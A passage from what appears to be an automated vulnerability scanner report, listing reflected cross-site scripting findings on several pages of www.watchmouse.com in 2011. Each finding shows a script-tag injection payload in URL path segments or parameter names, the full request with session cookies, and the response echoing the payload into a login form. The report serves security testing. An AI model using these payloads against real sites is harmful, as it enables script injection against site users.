This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de965ce"><script>alert(1)</script>9d6c19c90c2/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-29722c3d15dd84a5fb39b1b1944d51a7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/de965ce"><script>alert(1)</script>9d6c19c90c2/feature/public-status-page.html" method="post">
...[SNIP]...

1.61. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fd9"><script>alert(1)</script>01b2edc89ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/featuref1fd9"><script>alert(1)</script>01b2edc89ed/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-ba80288d1c13fc0a830740ea63bc5c6c"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/featuref1fd9"><script>alert(1)</script>01b2edc89ed/public-status-page.html" method="post">
...[SNIP]...

1.62. http://www.watchmouse.com/de/feature/public-status-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3b4"><script>alert(1)</script>f0266383555 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/public-status-page.htmlbe3b4"><script>alert(1)</script>f0266383555 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-8644ea6d0f6042165712c989e6ca7708"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/feature/public-status-page.htmlbe3b4"><script>alert(1)</script>f0266383555" method="post">
...[SNIP]...

1.63. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8acce"><script>alert(1)</script>7186806a23a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de8acce"><script>alert(1)</script>7186806a23a/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a483251fb53cc90294693a8f84643ae2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/de8acce"><script>alert(1)</script>7186806a23a/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.64. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>03423c381c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/featuree9d2b"><script>alert(1)</script>03423c381c1/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:03 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-8d53818f897146fe01c9690472408ae5"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/featuree9d2b"><script>alert(1)</script>03423c381c1/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.65. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3cc6"><script>alert(1)</script>e6dfa6d7ef4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/transaction-monitoring-web-application-testing.htmlc3cc6"><script>alert(1)</script>e6dfa6d7ef4 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-c6e51b4374e3493f7f1b15f1c8ad3ad6"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.htmlc3cc6"><script>alert(1)</script>e6dfa6d7ef4" method="post">
...[SNIP]...

1.66. http://www.watchmouse.com/de/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77f5a"><script>alert(1)</script>a690508e1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/feature/transaction-monitoring-web-application-testing.html?77f5a"><script>alert(1)</script>a690508e1b3=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-41e192f984b75a1677346841b9bc01be"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="/de/feature/transaction-monitoring-web-application-testing.html?77f5a"><script>alert(1)</script>a690508e1b3=1" method="post">
...[SNIP]...

1.67. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6776"><script>alert(1)</script>8f01e9a661e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /dee6776"><script>alert(1)</script>8f01e9a661e/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:17 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b15e32332f1971fc52944f1b58313cce"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dee6776"><script>alert(1)</script>8f01e9a661e/learn_more.php" method="post">
...[SNIP]...

1.68. http://www.watchmouse.com/de/learn_more.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a845b"><script>alert(1)</script>3674185b0b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/learn_more.phpa845b"><script>alert(1)</script>3674185b0b1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-85198e259ee9aa4a11ad85851c189f93"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/learn_more.phpa845b"><script>alert(1)</script>3674185b0b1" method="post">
...[SNIP]...

1.69. http://www.watchmouse.com/de/learn_more.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1db28"><script>alert(1)</script>d57baea6d54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/learn_more.php?1db28"><script>alert(1)</script>d57baea6d54=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:09:10 GMT
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/learn_more.php?1db28"><script>alert(1)</script>d57baea6d54=1" method="post">
...[SNIP]...

1.70. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f72d8"><script>alert(1)</script>094600cf9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /def72d8"><script>alert(1)</script>094600cf9e0/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3266ed08f9bd73f312adb1cb7b2990d1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/def72d8"><script>alert(1)</script>094600cf9e0/plans_price.php" method="post">
...[SNIP]...

1.71. http://www.watchmouse.com/de/plans_price.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9724f"><script>alert(1)</script>b69cc004d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/plans_price.php9724f"><script>alert(1)</script>b69cc004d9 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-5f44d3fcacbfad0c4ac178e16512a965"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/plans_price.php9724f"><script>alert(1)</script>b69cc004d9" method="post">
...[SNIP]...

1.72. http://www.watchmouse.com/de/plans_price.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdc88"><script>alert(1)</script>0395becefe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/plans_price.php?bdc88"><script>alert(1)</script>0395becefe6=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-de-4a91ae575210e8129a2513cf548ba657"
Content-Language: de
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/de/plans_price.php?bdc88"><script>alert(1)</script>0395becefe6=1" method="post">
...[SNIP]...

1.73. http://www.watchmouse.com/de/register.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4770"><script>alert(1)</script>b1bfa4f784d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /def4770"><script>alert(1)</script>b1bfa4f784d/register.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:34 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f45316343b67e401bef4babfda3fa7f8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/def4770"><script>alert(1)</script>b1bfa4f784d/register.php" method="post">
...[SNIP]...

1.74. http://www.watchmouse.com/de/register.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /de/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcd2"><script>alert(1)</script>9e0e36560e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /de/register.php6dcd2"><script>alert(1)</script>9e0e36560e6 HTTP/1.1
Host: www.watchmouse.com
